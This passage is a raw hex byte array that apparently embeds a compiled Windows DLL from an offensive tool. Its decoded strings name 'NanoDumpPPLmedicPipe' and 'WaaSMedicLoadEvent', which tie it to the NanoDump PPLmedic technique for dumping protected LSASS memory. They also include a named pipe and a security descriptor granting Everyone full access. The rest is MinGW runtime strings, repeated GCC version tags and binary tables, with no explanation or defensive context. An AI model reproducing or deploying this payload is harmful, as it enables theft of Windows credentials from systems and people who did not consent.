,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x47,0x00,0x6C,0x00,0x6F,0x00,0x62,0x00,0x61,0x00,0x6C,0x00,0x5C,0x00,0x25,0x00,0x77,0x00,0x73,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x44,0x00,0x3A,0x00,0x28,0x00,0x41,0x00,0x3B,0x00,0x4F,0x00,0x49,0x00,0x43,0x00,0x49,0x00,0x3B,0x00,0x47,0x00,0x41,0x00,0x3B,0x00,0x3B,0x00,0x3B,0x00,0x57,0x00,0x44,0x00,0x29,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00,0x2E,0x00,0x5C,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x5C,0x00,0x25,0x00,0x77,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4E,0x00,0x61,0x00,0x6E,0x00,0x6F,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x50,0x00,0x50,0x00,0x4C,0x00,0x6D,0x00,0x65,0x00,0x64,0x00,0x69,0x00,0x63,0x00,0x50,0x00,0x69,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x57,0x00,0x61,0x00,0x61,0x00,0x53,0x00,0x4D,0x00,0x65,0x00,0x64,0x00,0x69,0x00,0x63,0x00,0x4C,0x00,0x6F,0x00,0x61,0x00,0x64,0x00,0x45,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE1,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0xAE,0x68,0x03,0x00,0x00,0x00,0x08,0xA0,0xAE,0x68,0x03,0x00,0x00,0x00,0xCC,0x62,0xAE,0x68,0x03,0x00,0x00,0x00,0x30,0x90,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4D,0x69,0x6E,0x67,0x77,0x2D,0x77,0x36,0x34,0x20,0x72,0x75,0x6E,0x74,0x69,0x6D,0x65,0x20,0x66,0x61,0x69,0x6C,0x75,0x72,0x65,0x3A,0x0A,0x00,0x00,0x00,0x00,0x00,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x20,0x68,0x61,0x73,0x20,0x6E,0x6F,0x20,0x69,0x6D,0x61,0x67,0x65,0x2D,0x73,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x66,0x6F,0x72,0x20,0x25,0x64,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x63,0x6F,0x64,0x65,0x20,0x30,0x78,0x25,0x78,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x70,0x72,0x6F,0x74,0x6F,0x63,0x6F,0x6C,0x20,0x76,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x62,0x69,0x74,0x20,0x73,0x69,0x7A,0x65,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x25,0x64,0x20,0x62,0x69,0x74,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x25,0x70,0x20,0x6F,0x75,0x74,0x20,0x6F,0x66,0x20,0x72,0x61,0x6E,0x67,0x65,0x2C,0x20,0x74,0x61,0x72,0x67,0x65,0x74,0x69,0x6E,0x67,0x20,0x25,0x70,0x2C,0x20,0x79,0x69,0x65,0x6C,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x20,0x25,0x70,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0xF1,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x1E,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x1E,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x17,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0x62,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x24,0x00,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x62,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x62,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x90,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x90,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x90,0xAE,0x68,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x0C,0x10,0x00,0x00,0x00,0x30,0x01,0x00,0x10,0x10,0x00,0x00,0xDF,0x11,0x00,0x00,0x04,0x30,0x01,0x00,0xE0,0x11,0x00,0x00,0x3C,0x13,0x00,0x00,0x1C,0x30,0x01,0x00,0x40,0x13,0x00,0x00,0x52,0x13,0x00,0x00,0x30,0x30,0x01,0x00,0x60,0x13,0x00,0x00,0x6F,0x13,0x00,0x00,0x34,0x30,0x01,0x00,0x70,0x13,0x00,0x00,0x7C,0x13,0x00,0x00,0x38,0x30,0x01,0x00,0x80,0x13,0x00,0x00,0x81,0x13,0x00,0x00,0x3C,0x30,0x01,0x00,0x90,0x13,0x00,0x00,0xF1,0x13,0x00,0x00,0x40,0x30,0x01,0x00,0xF1,0x13,0x00,0x00,0x42,0x16,0x00,0x00,0x4C,0x30,0x01,0x00,0x42,0x16,0x00,0x00,0x99,0x16,0x00,0x00,0x58,0x30,0x01,0x00,0x99,0x16,0x00,0x00,0x13,0x17,0x00,0x00,0x60,0x30,0x01,0x00,0x13,0x17,0x00,0x00,0x39,0x18,0x00,0x00,0x6C,0x30,0x01,0x00,0x39,0x18,0x00,0x00,0x0A,0x19,0x00,0x00,0x78,0x30,0x01,0x00,0x0A,0x19,0x00,0x00,0x33,0x1A,0x00,0x00,0x84,0x30,0x01,0x00,0x33,0x1A,0x00,0x00,0xED,0x1C,0x00,0x00,0x90,0x30,0x01,0x00,0xED,0x1C,0x00,0x00,0x4E,0x20,0x00,0x00,0x9C,0x30,0x01,0x00,0x4E,0x20,0x00,0x00,0xEB,0x20,0x00,0x00,0xA8,0x30,0x01,0x00,0xEB,0x20,0x00,0x00,0x90,0x21,0x00,0x00,0xB4,0x30,0x01,0x00,0x90,0x21,0x00,0x00,0xC5,0x21,0x00,0x00,0xC0,0x30,0x01,0x00,0xC5,0x21,0x00,0x00,0x3F,0x25,0x00,0x00,0xC8,0x30,0x01,0x00,0x3F,0x25,0x00,0x00,0x47,0x25,0x00,0x00,0xD4,0x30,0x01,0x00,0x47,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xD8,0x30,0x01,0x00,0x50,0x25,0x00,0x00,0x14,0x26,0x00,0x00,0xDC,0x30,0x01,0x00,0x14,0x26,0x00,0x00,0x0F,0x27,0x00,0x00,0xE8,0x30,0x01,0x00,0x0F,0x27,0x00,0x00,0x1C,0x27,0x00,0x00,0xF4,0x30,0x01,0x00,0x1C,0x27,0x00,0x00,0x95,0x2C,0x00,0x00,0xF8,0x30,0x01,0x00,0x95,0x2C,0x00,0x00,0x63,0x2D,0x00,0x00,0x08,0x31,0x01,0x00,0x63,0x2D,0x00,0x00,0x67,0x30,0x00,0x00,0x0C,0x31,0x01,0x00,0x67,0x30,0x00,0x00,0xA4,0x32,0x00,0x00,0x1C,0x31,0x01,0x00,0xB0,0x32,0x00,0x00,0x17,0x33,0x00,0x00,0x28,0x31,0x01,0x00,0x17,0x33,0x00,0x00,0xCB,0x33,0x00,0x00,0x34,0x31,0x01,0x00,0xCB,0x33,0x00,0x00,0xA2,0x34,0x00,0x00,0x40,0x31,0x01,0x00,0xA2,0x34,0x00,0x00,0x11,0x35,0x00,0x00,0x4C,0x31,0x01,0x00,0x11,0x35,0x00,0x00,0x82,0x36,0x00,0x00,0x50,0x31,0x01,0x00,0x82,0x36,0x00,0x00,0xAC,0x37,0x00,0x00,0x60,0x31,0x01,0x00,0xB0,0x37,0x00,0x00,0xF9,0x37,0x00,0x00,0x70,0x31,0x01,0x00,0xF9,0x37,0x00,0x00,0x51,0x39,0x00,0x00,0x7C,0x31,0x01,0x00,0x51,0x39,0x00,0x00,0x40,0x3A,0x00,0x00,0x88,0x31,0x01,0x00,0x40,0x3A,0x00,0x00,0xA5,0x3B,0x00,0x00,0x94,0x31,0x01,0x00,0xA5,0x3B,0x00,0x00,0xF7,0x3D,0x00,0x00,0xA0,0x31,0x01,0x00,0xF7,0x3D,0x00,0x00,0xE7,0x3E,0x00,0x00,0xAC,0x31,0x01,0x00,0xE7,0x3E,0x00,0x00,0x0A,0x46,0x00,0x00,0xB8,0x31,0x01,0x00,0x10,0x46,0x00,0x00,0xD3,0x46,0x00,0x00,0xC8,0x31,0x01,0x00,0xD3,0x46,0x00,0x00,0x5D,0x4A,0x00,0x00,0xD4,0x31,0x01,0x00,0x60,0x4A,0x00,0x00,0x82,0x4A,0x00,0x00,0xE0,0x31,0x01,0x00,0x82,0x4A,0x00,0x00,0x5F,0x4B,0x00,0x00,0xEC,0x31,0x01,0x00,0x5F,0x4B,0x00,0x00,0xEB,0x4B,0x00,0x00,0xF8,0x31,0x01,0x00,0xEB,0x4B,0x00,0x00,0x5D,0x4C,0x00,0x00,0x04,0x32,0x01,0x00,0x5D,0x4C,0x00,0x00,0xD7,0x4F,0x00,0x00,0x10,0x32,0x01,0x00,0xD7,0x4F,0x00,0x00,0x70,0x50,0x00,0x00,0x20,0x32,0x01,0x00,0x70,0x50,0x00,0x00,0x75,0x51,0x00,0x00,0x2C,0x32,0x01,0x00,0x75,0x51,0x00,0x00,0xB4,0x51,0x00,0x00,0x38,0x32,0x01,0x00,0xB4,0x51,0x00,0x00,0x1C,0x53,0x00,0x00,0x44,0x32,0x01,0x00,0x1C,0x53,0x00,0x00,0x1E,0x54,0x00,0x00,0x50,0x32,0x01,0x00,0x1E,0x54,0x00,0x00,0x13,0x55,0x00,0x00,0x5C,0x32,0x01,0x00,0x13,0x55,0x00,0x00,0xC2,0x56,0x00,0x00,0x6C,0x32,0x01,0x00,0xC2,0x56,0x00,0x00,0x5D,0x58,0x00,0x00,0x7C,0x32,0x01,0x00,0x5D,0x58,0x00,0x00,0xC4,0x58,0x00,0x00,0x8C,0x32,0x01,0x00,0xC4,0x58,0x00,0x00,0x92,0x59,0x00,0x00,0x98,0x32,0x01,0x00,0x92,0x59,0x00,0x00,0xF0,0x59,0x00,0x00,0xA4,0x32,0x01,0x00,0xF0,0x59,0x00,0x00,0xFF,0x59,0x00,0x00,0xB0,0x32,0x01,0x00,0xFF,0x59,0x00,0x00,0x6A,0x5A,0x00,0x00,0xB8,0x32,0x01,0x00,0x6A,0x5A,0x00,0x00,0xDB,0x5B,0x00,0x00,0xC4,0x32,0x01,0x00,0xDB,0x5B,0x00,0x00,0x19,0x5C,0x00,0x00,0xD0,0x32,0x01,0x00,0x19,0x5C,0x00,0x00,0x2B,0x5C,0x00,0x00,0xDC,0x32,0x01,0x00,0x2B,0x5C,0x00,0x00,0x38,0x5D,0x00,0x00,0xE4,0x32,0x01,0x00,0x38,0x5D,0x00,0x00,0x92,0x5D,0x00,0x00,0xF0,0x32,0x01,0x00,0x92,0x5D,0x00,0x00,0xF4,0x5D,0x00,0x00,0xFC,0x32,0x01,0x00,0xF4,0x5D,0x00,0x00,0x69,0x5F,0x00,0x00,0x08,0x33,0x01,0x00,0x69,0x5F,0x00,0x00,0xEB,0x5F,0x00,0x00,0x14,0x33,0x01,0x00,0xEB,0x5F,0x00,0x00,0x40,0x60,0x00,0x00,0x20,0x33,0x01,0x00,0x40,0x60,0x00,0x00,0xE8,0x60,0x00,0x00,0x2C,0x33,0x01,0x00,0xE8,0x60,0x00,0x00,0x72,0x61,0x00,0x00,0x38,0x33,0x01,0x00,0x72,0x61,0x00,0x00,0x1D,0x62,0x00,0x00,0x44,0x33,0x01,0x00,0x1D,0x62,0x00,0x00,0x96,0x63,0x00,0x00,0x50,0x33,0x01,0x00,0x96,0x63,0x00,0x00,0x75,0x65,0x00,0x00,0x60,0x33,0x01,0x00,0x75,0x65,0x00,0x00,0x17,0x67,0x00,0x00,0x6C,0x33,0x01,0x00,0x20,0x67,0x00,0x00,0x48,0x69,0x00,0x00,0x78,0x33,0x01,0x00,0x48,0x69,0x00,0x00,0x70,0x6B,0x00,0x00,0x84,0x33,0x01,0x00,0x70,0x6B,0x00,0x00,0x98,0x6D,0x00,0x00,0x90,0x33,0x01,0x00,0x98,0x6D,0x00,0x00,0x21,0x6E,0x00,0x00,0x9C,0x33,0x01,0x00,0x21,0x6E,0x00,0x00,0xAC,0x6E,0x00,0x00,0xA8,0x33,0x01,0x00,0xAC,0x6E,0x00,0x00,0xAC,0x6F,0x00,0x00,0xB4,0x33,0x01,0x00,0xAC,0x6F,0x00,0x00,0xF9,0x6F,0x00,0x00,0xC0,0x33,0x01,0x00,0xF9,0x6F,0x00,0x00,0x46,0x70,0x00,0x00,0xCC,0x33,0x01,0x00,0x46,0x70,0x00,0x00,0x93,0x70,0x00,0x00,0xD8,0x33,0x01,0x00,0x93,0x70,0x00,0x00,0xEF,0x72,0x00,0x00,0xE4,0x33,0x01,0x00,0xEF,0x72,0x00,0x00,0x7E,0x73,0x00,0x00,0xF0,0x33,0x01,0x00,0x7E,0x73,0x00,0x00,0xF0,0x73,0x00,0x00,0xFC,0x33,0x01,0x00,0xF0,0x73,0x00,0x00,0xB1,0x74,0x00,0x00,0x08,0x34,0x01,0x00,0xB1,0x74,0x00,0x00,0x4B,0x76,0x00,0x00,0x14,0x34,0x01,0x00,0x4B,0x76,0x00,0x00,0x94,0x76,0x00,0x00,0x20,0x34,0x01,0x00,0x94,0x76,0x00,0x00,0xDD,0x77,0x00,0x00,0x2C,0x34,0x01,0x00,0xDD,0x77,0x00,0x00,0xF2,0x78,0x00,0x00,0x38,0x34,0x01,0x00,0xF2,0x78,0x00,0x00,0x14,0x7A,0x00,0x00,0x44,0x34,0x01,0x00,0x14,0x7A,0x00,0x00,0xAE,0x7D,0x00,0x00,0x50,0x34,0x01,0x00,0xAE,0x7D,0x00,0x00,0x99,0x7E,0x